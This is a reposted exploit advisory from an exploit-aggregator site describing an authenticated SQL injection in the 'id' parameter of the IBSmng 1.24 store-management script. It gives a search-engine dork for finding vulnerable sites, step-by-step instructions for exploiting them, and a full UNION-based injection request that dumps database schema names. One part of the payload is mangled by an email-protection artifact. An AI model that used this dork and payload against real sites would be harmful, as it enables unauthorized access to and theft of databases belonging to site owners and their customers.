Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080035

Below is a copy:

IBSmng 1.24 - 'id' SQL Injection (Authenticated)
# Exploit Title: IBSmng 1.24 - 'id' SQL Injection (Authenticated)
# Dork: inurl:index.php inurl:group= inurl:mode=auto
# Date: 2020-08-02
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: IBSmng.ir
# Tested on: Windows/Linux
# Version: 1.24 [Final Version]



.:: Script Description ::.
This Script Is Using To Manage Your Online Store And Online Store



.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With the above Dork.
Step 2 - Create An Account.
Step 3 - Login To Your Account.
Step 4 - Click On Buy Services.
Step 5 - Inject Your Payload in 'id' Parameter.




.:: Sample Request ::.
localhost/user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:[email protected]_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11,12%23

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.